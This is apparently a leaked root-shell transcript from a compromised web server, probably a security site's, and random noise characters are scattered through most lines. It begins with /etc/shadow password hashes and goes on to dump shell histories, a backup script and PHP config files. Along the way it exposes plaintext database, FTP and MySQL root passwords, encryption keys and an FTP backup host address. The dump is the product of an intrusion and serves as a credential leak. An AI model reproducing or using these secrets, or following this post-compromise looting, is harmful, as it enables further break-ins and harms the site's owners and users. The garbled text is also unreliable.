com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::8 S4 M5 m! {, V. H: V1 X
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::) l' i9 E2 ?: u- l; H7 n' O
$ C. r6 `" U. u" }
sh-3.2# cat /etc/motd
% M6 g+ w/ e& Y! n3 O#####################################################, _0 P$ Y* N2 t/ B" f
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
L' K [2 e, s% X1 M" ?- b4 j4 U4 y% n# |__| [__ | |__| | |__| | | | [__ | |__| #
2 Z8 F4 t5 J* @- Y* t# | | ___] | | | |___ | | \/ | ___] | | | #
& {, ^. }+ o0 u/ F+ _+ t; _- M& m# #
( c5 O: L' t: I: x' p& }#####################################################! @( z3 k& `( S) ]# G3 O7 d$ M
# #
7 K5 q" S5 e7 [ F& _ s# Admin Contact - 链接标记support@secureservertech.com #$ m4 f4 \5 T- ?
# #
/ N2 q: P s" T' N/ a8 P- f1 N) t" R# Available ShortCuts #
+ a, f* r' k; y/ I9 m8 V: S# #, l' S2 a3 w6 l; T, m
# nst - list active connections #: S& k3 B+ ]8 j
# ddos - shows how many times each ip is connected #9 _: [, U" E/ v/ [6 S7 t
# ltr - restart the webserver #; K- e; I9 C, d% Y4 ^( B
# phpc - edit the php config file #1 d; H6 [& I% h7 \
# htc - edit the webserver configuration file #
8 G9 G6 m# i! q- }7 s/ w# up - uptime #
! O% a$ w2 c: e$ Q% P# etd - edit the motd of the day file #
, `/ i0 j8 X0 R. F# htr - start and restart apache if needed #% B& Y, h6 F4 \' @: l9 m" z7 ?
# syng - shows active SYN_RECV connections #! f8 j2 H7 L# L( q1 ^
# synd - syn flood blocker - “synd -h” for usage #" z8 J$ v- h3 r, X
#####################################################
; _4 U* X v+ ~# Y# NOTES: #
/ S/ h0 K) S3 k, p& z7 `- p- }& _# Last Upgrade - 12-08-2008 by JF #( P# L$ m: ~; v
# My.cnf/Mysql Optimization - 1-28-09 #
$ H0 j/ C( h8 B% v) n8 s3 W# #
' K. X% X* L2 b& |4 D% `# #
' g. f; U3 t9 I& q$ X& a% z- o# #
2 g& j8 K5 `3 F7 V1 o4 C#####################################################" X4 R3 `3 e1 b
+ C: J3 P+ n* zsh-3.2# lastlog | grep -v Never5 x, h% Z+ U' M9 }! |8 r( ~
Username Port From Latest
. V) s/ T$ A7 i: l: R3 [root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009/ _# C2 X& K8 S8 u4 F
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008( {6 _0 \0 B7 u8 r8 [
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
1 V3 e" s, d6 c' y8 @astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20090 S* F8 v `& D; b. K7 E
- _7 W4 }, o2 t- ~
sh-3.2# ls -la
( a! P; N8 C& Y5 E3 Q# u$ F2 Vtotal 453376
$ e8 b8 g/ q' S2 wdrwxr-x— 15 root root 4096 Jun 4 08:40 .: k0 T1 N j8 I. n2 X
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* l* {( y2 `7 J8 z4 e
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
* ^. Q O$ ^* [- g/ t-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg- b# n1 t v/ G7 l: i
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history' ?& D6 |0 ^) A# j
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout% u, t) f( H) J' j% w
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile i& ?8 v5 t* G1 n, g& d
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc7 i/ ]5 s3 N0 {; _: e
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh6 d9 `3 X/ d' t, ]
-rw-r–r– 1 root root 1327 Nov 29 2007 cert* `( B5 W/ O0 z& f" X! \( J9 W
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
/ i6 W d2 T, ddrwxr-xr-x 4 root root 4096 May 20 2008 .cpan. _; w4 w( J: l5 w
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
% F$ T# p, j3 _; i, a$ t-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
1 v" `/ H8 m3 H- x i( x- R) z2 edrwx—— 2 root root 4096 Oct 28 2007 .elinks- |: {. ]1 x- F3 S
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
7 w/ B d$ g. R/ b3 u# x7 u-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
( I& n9 e/ u8 h-rw——- 1 root root 0 Apr 16 13:19 .history$ c" R" {+ S4 h9 W; z& r
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log3 @' L' D0 n+ C" k& f
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
2 W* f! V0 i; ]/ g6 t, s-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
' E% \+ F2 X4 m( H4 |9 M-rw——- 1 root root 35 Jun 2 14:23 .lesshst; `/ U: L6 H: M3 s4 z
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
1 r% P" o( W% K2 W _% ydrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
2 d: V) P8 @6 _! j6 v6 x& t-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
" V% W+ p6 z; G, A" A z" B6 {& e8 S-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2" x+ o- W9 [0 P/ a* i0 \
-rwx—— 1 root root 760 Sep 18 2008 lp/ P3 \1 U+ g2 q6 M& s
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
_8 e* [4 F+ L! ^-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz5 ?! ?9 D3 p1 F; s+ T! j% v
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
6 ~) g+ ^* Q" p- N. l! adrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
& N4 n6 g( B* ~) c: r% b-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz7 `/ d4 j$ z0 N7 P/ m# b; _
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3) s* C6 D, ]# E8 E& a
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz: {4 M3 z+ K+ K. F' P- S
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
' ?8 O- U: a7 Y5 A: M5 f! S-rw——- 1 root root 41 Oct 19 2007 .my.cnf
7 {+ x! e$ U; f0 X" Z-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
/ U' O* ~8 D" N E-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport0 ?; e) @1 j7 [6 v8 @
-rw——- 1 root root 41 May 20 2008 .mytop
+ l- J O+ \' Y/ D {drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
$ X7 t5 A1 S" ^; s0 k- Y6 Z. k; f5 d; _-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
/ M: |( [- n- |* {9 pdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
! `% {# B0 T7 R R7 \( U$ k) v3 K-rw——- 1 root root 1462 Sep 21 2007 opt.php
! V# r4 D! b" z" ?7 Q-rw-r–r– 1 root root 3371 Sep 22 2007 p
) u7 I# [. N A/ u-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2, B. G% z7 B O6 R& L/ n
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
V8 s% D2 C# ^* x8 [% a, Q-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
# ?8 E6 W4 t( {5 @) Y% i1 [-rw-r–r– 1 root root 887 Nov 28 2007 server.key
; {% _& n e8 s' H! O) R. F7 P* Edrwx—— 2 root root 4096 Oct 10 2008 .ssh
, i/ o5 M4 g! w2 \, w" s7 J-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
& ~6 g" k- v% H$ m-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc4 w9 g7 n' M/ p/ y z
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip: ~. t+ V1 D% J9 U0 c% ?. m
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
' S1 G) b9 h: ~/ z& y+ s2 {drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp' z, R1 @" W1 d+ t/ x
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh5 L7 x/ V' {/ m1 C; I
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0 _) _. J9 z/ Z4 V+ n! M
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
) v8 Y" s( X% v- \( }/ ~-rw——- 1 root root 12997 May 16 2008 .viminfo6 ~8 h! r, s5 \ K2 E# \' M1 W! z
* a& P8 o0 m8 L9 W9 Msh-3.2# cat .bash_history1 G6 _1 F# F* ?* x3 m
[snip]) }4 R" f" d+ Y
wget cp4sst.com/sstlinux.tar.gz
; {" Y) g+ o1 f/ u) dtar zxvf sstlinux.tar.gz
7 |. _/ B) n/ [! t( X1 b& pcd linux-2.6.27.10" C* N, l: _5 `
sh install.sh
+ Z. L' H5 C4 B4 o, F5 zmake bzImage ; make modules ; make modules_install ; make install
0 `/ `" W2 ]; D- F. d! `make clean% T* K9 T; z% h; x& B) g
service mysqld restart
8 \' b: ~3 s: ~; O2 E( u- r[snip]1 I" f/ C3 z3 u% f( t
cd /usr/sbin/6 ?+ T6 a- Z+ V. \1 p$ ^3 J' b
chmod 4777 traceroute; z$ o; i1 r7 g/ P
chmod 4777 ping( P! }( N3 p6 y( R" L8 w
traceroute -I 链接标记[url]www.astalavista.ch[/url]* Z% Z+ H8 m5 C# E
[snip]
5 x2 G; v8 U$ Jvi /etc/csf/csf.conf
; x$ v' I# g' U% V; D2 Z9 |! wtraceroute google.ch
+ U$ V9 j, t1 `& M1 W; P+ |/ Aservice csf restart
6 n3 J" \' O$ W7 Otracert google.ch
1 l8 J5 a: G+ B/ f, _# Yservice csf restart
: s3 L2 ^* W! ptraceroute 链接标记[url]www.google.ch[/url]
( K/ k& z- }' Y1 y; {% {* T$ r+ stracert 链接标记[url]www.google.ch[/url]: ^. m. |2 S# z2 {- Q. p- s
traceroute 链接标记[url]www.google.ch[/url]
1 b% s, X7 j; }" X( `. slocate traceroute
9 ?# ]8 n% c, z7 A6 _" bchown 4755 /bin/traceroute
, `1 o. \0 ^* v- ?& Dchown 4777 /bin/traceroute8 n0 |4 `2 s3 C* Q0 z
locate ping
/ u- I3 }6 Y! W) N% _& K- i/ Lchown 4755 /bin/ping
; M8 c. x4 L+ X5 f. Vchown 4777 /bin/ping
* g: c# e$ D- u9 K# P+ \7 ^cd /bin/8 I9 K# M" M1 r" x$ I4 W
ls -ali | grep ping7 g$ s+ ?0 D X9 T% L8 I
chown root ping; c. V' |) K5 O: g
chmod 4755 ping3 p8 x0 Q, K% W1 l$ r6 Y
ls -ali | grep traceroute
0 p& t9 k2 G% o6 i0 T0 hchown root traceroute
7 Z/ g- A- Y& _0 [4 I9 s: }: Jchmod 4755 traceroute; h& O9 e2 a3 t+ P- D2 n2 q" f% @
ls -ali | grep traceroute
8 f" F; F( t* ~6 U4 N; ]( Etraceroute -I 链接标记[url]www.google.ch[/url]
" ^" n9 z {' i) s5 c* P) b) atraceroute 链接标记[url]www.google.ch[/url]0 Q9 ]5 K4 y, O3 I1 w: A! [2 H+ C1 ~
whois pmsantos.ch) E, m6 s" _ f/ y: T
[snip]4 P' Q6 g) u I* m4 n1 N
mysql -h com_contrexx2_live < /root/defaultp_ports.sql2 O$ p! k- T% x! K1 m: {7 t( W
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql4 A6 q8 Y2 m" b T6 M
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
6 X& o8 V, D' r/ bmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql( F: @0 P' x9 T# x) h% r- z5 H
top! \4 b5 T! M) g# ?9 Q
ping ssth.ch
) ]9 K: u. ]( j: ~' ^- gping asdlkfaljgasd???ljg???lasj.ch1 y( y: n. }! y3 _" @. P8 v
ping asdlkfaljgasdlasj.ch
. }! x2 {$ x; ]: @* ?ping 链接标记[url]www.ssth.ch[/url]; ^1 { U2 h9 L- m9 L+ E
ping ssth.ch% f F: U$ @, h2 r6 t- v
nslookup 链接标记[url]www.google.ch[/url]
4 S/ u5 y/ m$ j+ `nslookup 链接标记[url]www.ssth.ch[/url]
% L% ?6 m7 w3 \; Mman nslookup8 U& S2 ]2 q- r2 a/ p# @' m
ping 链接标记[url]www.google.ch[/url]
' i- F! D5 E3 u, M9 p* |, Y3 Hnslookup 链接标记[url]www.google.ch[/url]8 K; \. O- d$ G ~. r% h5 h: g/ b
nslookup 链接标记[url]www.google.ch[/url]
/ {. j; f$ Z# ~- \& rnslookup salfjasdlf.ch
, r% m" ^5 X5 x$ G, U[snip]
5 ~# S" V# I4 sopenssl passwd -1 sadf5 c6 J5 ?7 Z Y' ], g4 E; v
openssl passwd -1 5cZNHstdTy7 O) Y2 K' D! Z) V
mysql
; m% f2 K* p m6 R$ emysql
3 d' _ o# Z0 J x, _locate proftp
+ g7 C! ~% o1 l$ d+ r! g2 E5 Qvi /etc/proftpd.passwd/ N# ^ s/ j$ S. g0 ]( F- y. D8 ~
service proftpd restart
5 g) v& s0 j5 n9 L) Llocate proftpd.conf
5 u8 C) k9 W5 {vi /etc/proftpd.conf
; [" a$ P1 q: I% T; Rvi /etc/proftpd.passwd9 X/ L. A. ]6 x, z* f/ B
service proftpd restart
0 w8 K! N/ Y$ i, Y8 J# x[snip]+ K% z: K6 `" @ p) M7 s+ A# y! A
/bin/sh /home/com/backup_system/backup.sh
# }" O0 t+ p$ E& Y j% Q jtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin; x1 V) r) `/ n4 @/ v
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql+ `+ V8 G1 ]3 G% z! n
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql# }$ N# z# U( _& _% W" K5 V$ o
ls -ali) R# v5 N1 ?( x7 O$ |
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
8 n' O5 }1 M+ A( Hmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
) G2 ]# d& h* u% X: vcrontab -l
" ?0 t$ R( H! y U) Mcrontab -l" x- _4 }: x1 R
php -q /home/com/public_html/modifications/cronjobs/securitynews.php4 U, O; e2 S& w6 V* n5 h& `
/home/com/public_html/modifications/cronjobs/exploits.sh
: V7 H0 H6 ]2 c3 i; Z% y# fwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]% i8 o( l* J! o
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz2 Y% v* b- O! s' d5 I) T/ C
cd lsws-4.0.3
6 u2 M4 P @! z3 C9 osh install.sh
( x. Z9 i4 l; S# V$ n% X+ C: P6 H3 ouptime( g5 J. v" f" J( L2 A
hdparm -tt /dev/sda; \( A3 H3 P( i2 S A; h) [
iostat
* s" ?, V/ M W/ B: G5 qyum install iostat. z/ J: W3 M5 K0 G
iostat
' S* H3 B+ |- e5 Gwhereis iostat
3 ?2 h8 x& R. {( o) @! e- j) cyjm clean all K! r( r& _# a8 E1 n
yum clean all ; yum -y update4 U. T* }6 d) n8 D% b
iostat0 L5 q1 F d9 ^" H$ m) {% j$ v
yum install systat
1 K( d# h6 V! `1 B* d1 f4 Vrpm -qa | grep iostat1 }( W6 P2 ]& S% D. ? f& u8 e% C
rpm -qa | grep sysstat: @, _$ a9 Q1 E: B
rpm -qa | grep systat
8 R+ T9 [4 J+ b: l. i2 w% Odmesg -c
) ^0 j7 J; g& _9 T. ^sysctl -p
) E! i+ t6 C# duname -r2 O+ V* v! u# H/ n# u' ?
cd /usr/src1 Z4 J" }* k3 O8 W% G
wget nix101.com/kernels/sstlinux.tar.gz
& |/ y. Y# `0 P( J, K; @shutdown -r now
8 @0 T0 J. I* `2 |* e- R$ k1 Onano -w /boot/grub/grub.conf% R% H. r5 d4 Y) O
D$ N: l X! J( ysh-3.2# cat .my.cnf
$ j" p7 S/ z* N7 Y6 \- N6 ?[client]! }3 ?7 ]1 A: O' v T8 `
user=da_admin
, U1 k2 ]. M; M! H5 J1 Fpassword=X9dctmRH
5 L: o% T2 M6 U2 f* Z, d+ n( H" b6 f- m: ]
sh-3.2# cat /home/com/backup_system/backup.sh5 q$ H8 \9 I8 ~: {0 B4 i+ _0 v1 `
#!/bin/sh
2 ?6 H9 g- N7 u/ j( e' q2 }) a#####################################################################
3 h+ ]8 ?. y9 T$ L" S# #7 h, J3 B) B/ H- k
# incremental backup for astalavista.com #2 z5 r, n' T% Y; _7 o
# #
9 [, Z4 e4 {2 U4 u9 a3 M1 M# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
& S5 K# m# V5 P. c7 ~: L# #( D% e) V9 ?3 I& W+ v, K; V
#####################################################################8 j) W8 \ n. ~6 X" e( h9 g Z
[snip]
9 {2 u* i7 X, O5 O5 H$ uPROG_DIR=”/home/com/backup_system”;
( A8 w; z H4 R3 U# d7 P. ]BACKUP_DIR=”/home/com/backups”;
. D& Z) x: g3 |! i: v! X! ^' |DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;" g* `, w" C# n; w; ]5 J; l- M
# ftp for synology backup server
( Z$ S+ s1 w, J; OFTP_HOST=”212.254.194.163″;8 ~2 v3 K6 f2 V" |1 N8 s
FTP_PORT=”21″;, e7 [ P3 s, b+ y9 _" Q- W; Q* [; d
FTP_USER=”astalavista.com”;
z) {4 K$ R2 Y* j5 I& [7 YFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
2 a% u; ~' R h5 E) n% oFTP_DIR=”/astalavista.com”;
* p4 w' \9 X& p2 Y* z; a: f# database J; p: R* M- G Q4 I
DB_HOST=”localhost”;
! Q# R/ g/ B8 f) y4 s, ?+ M7 \DB_USER=”contrexxuser2″;! b8 p' E4 l: t ]2 i2 {
DB_PASS=”0fEYNZgXz1pKe”;, ?; I4 O' B u- z
DB_DATABASE1=”com_contrexx2_live”;
- o7 w7 I9 d) pDB_DATABASE2=”com_contrexx2″;( }( E! t6 L7 o L
[snip]
$ C9 c! n% D! ~& U4 fftp -in $FTP_HOST $FTP_PORT <<EOF
+ Q9 i* O$ V5 r! w+ jquote USER $FTP_USER
: ^" V1 R9 i8 Bquote PASS $FTP_PASS+ `" ?! |( O+ O1 e
cd $FTP_DIR
) m+ A8 U3 L y' a S/ M" [put $DB_FULLNAME-SQL_Dump.tar* y( W `/ J& n4 B
put $BACKUP_FULLNAME-Public_HTML.tar& E5 ?; I$ N9 Q# r& \
close$ r* r* k- ^% Q
bye
# q i- G) ^. \9 n0 C& ]0 lEOF
: J& o( Q$ L+ a* K, b8 a
6 O8 S' m" f1 qsh-3.2# cd /home
- U9 Y1 d1 _1 J5 }sh-3.2# ls -la
' x6 H8 W+ r; M; b/ [total 1201 o9 z/ Y! @3 M5 u% ~+ K5 t* C
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .; b5 A1 S4 v; L* k
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: b" w6 M4 {4 g! i; ~8 V0 s' Edrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
S9 Y Z2 W% [2 c-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
, ^% D0 S2 |# y-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
8 E4 L: \! Z" o5 A, B" hdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
4 B( o' [; q/ o) gdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
' t$ n! W+ x/ Z4 zdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161: _* s9 A! f) i7 C/ N: e/ \
drwx–x–x 10 com com 4096 Apr 28 12:40 com' {& n8 r+ e9 J# C5 u
drwxr-xr-x 2 root root 4096 May 17 2007 ftp2 G+ i* s" ~" v9 M
drwx—— 3 jon jon 4096 Sep 21 2007 jon
1 X6 A; Y s0 C! Kdrwx—— 2 root root 16384 Sep 11 2007 lost+found, U: T- x5 V# A- J: t
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
. e; l" X+ ^5 v. zdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
5 s& u3 Z3 y6 E" i& tdrwx—— 2 jon jon 4096 Sep 15 2007 test
) F3 z" C+ D, a7 ^. udrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
6 ~, T# C J# A7 U2 [2 o. q: {; i+ E1 ]1 i) }& @0 [* G
sh-3.2# cd admin+ N& e4 B% U$ y1 o, S
sh-3.2# ls -la
8 a9 I3 y; H, x5 J! y3 b. N! Qtotal 1735896
0 B+ o7 m+ l6 c# _; Hdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
" f7 }, q: q* n0 n5 _drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 A1 g( Z: n! [8 ?
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups& K$ m) X) [& ]- ^' ~% |6 M
drwx—— 2 admin admin 4096 Sep 28 2007 backups
" b& \. E3 M8 k8 R5 ?' H8 R9 d-rw——- 1 admin admin 860 Sep 17 2008 .bash_history. _+ i( H; |0 z0 s3 J, C
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout. N, x2 K3 P+ f! S" `
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
3 Q6 S6 Y' H2 }, }7 b5 r# i-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
6 |' |2 @3 Z3 C7 `7 q _2 b* [drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups3 z L$ F8 V4 A" {' s8 S$ J
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
; W1 {+ [. {: Ydrwxrwx— 3 admin mail 4096 Sep 21 2007 imap3 }/ U* @7 ]7 \& @, D, g H
-rw-r–r– 1 root root 24 Sep 21 2007 info.php; h1 q1 H& W. [; K# U
drwx—— 2 admin admin 4096 Sep 21 2007 mail; x. g& q- i( q1 p" `3 c1 D& J/ F
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr8 N, ~ o- _: ]7 c: _& V, S
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
- Q; Q) U# y$ w* {9 @; M-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow2 Y6 T* K, G$ Q$ z, D7 I7 k
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz* n' |$ Q( |2 W+ }
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups) P+ v0 c; s* p+ @9 k4 |5 R
8 X! Y) {9 d! i& r
sh-3.2# ..
r v+ S: \# r4 m4 p9 N, Nsh-3.2# cd jon
3 O$ h8 O6 O0 h$ I5 }% T2 gsh-3.2# ls -la6 j0 P3 `1 ~. y/ Q
total 36
6 v0 c i+ o9 Z1 qdrwx—— 3 jon jon 4096 Sep 21 2007 .; i7 \: J1 Y" o) H' |8 i; j
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..) \; I1 @& y8 z0 ~# _ y- \2 f* D
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
/ Q' m5 [6 d6 x, }6 F-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout, s3 \3 g& l: n/ B; F
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
% d. g- h/ \- @5 z9 [0 i-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
; \0 \8 Q+ O2 q$ v-rw-r–r– 1 root root 24 Sep 21 2007 info.php& V b4 E. @9 \4 u% t' T, v
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
4 o% b- C" H G$ `4 b0 ]+ e% u
* k# ^% q/ H! J/ T" J2 Fsh-3.2# cd .., L) d: F- ~3 @4 q- l$ E; c
sh-3.2# cd test/ ?& D' H9 E' L2 V% T1 r
sh-3.2# ls -la: b7 N7 i' U5 d) V0 l
total 48
3 w% C! a+ {+ W* i/ m0 ndrwx—— 2 jon jon 4096 Sep 15 2007 .5 |% _ W% \, _5 o
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 G0 c; O6 x+ b
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history5 L+ e/ H1 L9 J9 \! o9 _; @8 ?! a* ?
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
% P# j5 L1 N) y0 ]# ]. M-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
7 V. k F/ w$ B0 I* j-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc9 t& D( Z' y6 }! |2 T- F& I! m5 O
sh-3.2# cat .bash_history6 \2 ]* }8 A% `) E& q6 E! j( f7 Z
/usr/bin/mysqladmin -u root password PoliuJhytg673 R: h; X; {% V3 }
" g4 R/ u" D3 p! B
sh-3.2# cd ..
; I0 Y( n8 @6 l4 a- [sh-3.2# cd astanet8 Y* D- B$ F5 O0 ~
sh-3.2# ls -la
; e1 i) t) O' jtotal 52
! {, M! w$ A6 Pdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .! z, F" ~1 b2 |0 y2 ~6 v1 e
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( E4 E' G- n* T ^; V5 @
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
" R8 l3 t9 H2 V- S3 B-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
4 @9 w. y4 m% E5 O-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout' _; A+ R* B( Y7 w
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
5 ]* q. e: m% [6 P+ U& g5 R0 N7 S-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc* {* A4 Y$ g+ q
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains3 ^' q+ b& w6 d' v0 _
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap. U6 n7 O9 _5 [5 c+ F- P
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
* ^) f1 i7 Y2 Q# @* f; C-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
+ {) E' @" ~+ O- F" O% N! flrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html7 u. B( \# s: W, U) P1 |: |+ m
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
% k q' M& ~* L. r4 W& g: ]$ S" t& l
sh-3.2# cd auth/% R+ b9 P) W# k5 g5 H
sh-3.2# ls -la
/ G: X. F9 ?! k/ b% a! `total 28
4 ~( O+ u" V! a `drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
* [; Z E' B9 W" cdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..( j1 f6 H( C O+ p! C
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php w# `: ?1 V+ Y. w; F( G8 {
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php7 d4 \6 H) v% j V2 }0 x: z
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd) \; T+ y* L, {3 U s0 q8 Z
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting+ \7 c$ C5 @8 {6 A4 G& Q
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
" r7 I7 u8 ]$ Q1 c3 f+ O
( W V. ^% R3 N" msh-3.2# cat hackercontest.config.inc.php
: s0 @# r/ ~% N- O<?PHP! B& N; p% D" _* j W% h+ G
// Variabeln f?r Verbindung zur Datenbank /// y$ F, g( \3 u; ]+ X4 l! a" V
$conxHost = ‘localhost’; // MySQL hostname
( r% l0 m& P8 m0 z; T$conxUser = ‘hackercontest’; // MySQL user
; W5 X9 c2 N% |9 J, M$conxPassword = ‘K6m@7dUc’; // MySQL password% ]1 q6 A: V' {! x" c2 C
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
% R: A4 c( H& o. `?>
+ s* K$ }5 j; N/ nsh-3.2# cat hosting.config.inc.php, l' g7 y# |8 f" R2 [, Y; b
<?PHP
8 N1 p) F2 R. H// Variabeln f?r Verbindung zur Datenbank //
/ b( ]/ B* X0 A4 J6 E$conxHost = ‘localhost’; // MySQL hostname5 j+ g7 m4 y [( Q% S/ D
$conxUser = ‘hostinguser’; // MySQL user
/ D+ M% b2 J9 x( c: B) A7 m$conxPassword = ‘cXvB3981′; // MySQL password; a5 G% \ Z9 n6 ^6 I# E
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish4 ?. h9 K6 ?7 M' x L
?>
/ y, \& L# W& v4 @7 T, D5 E% x( I( b$ j' @
sh-3.2# cd ..
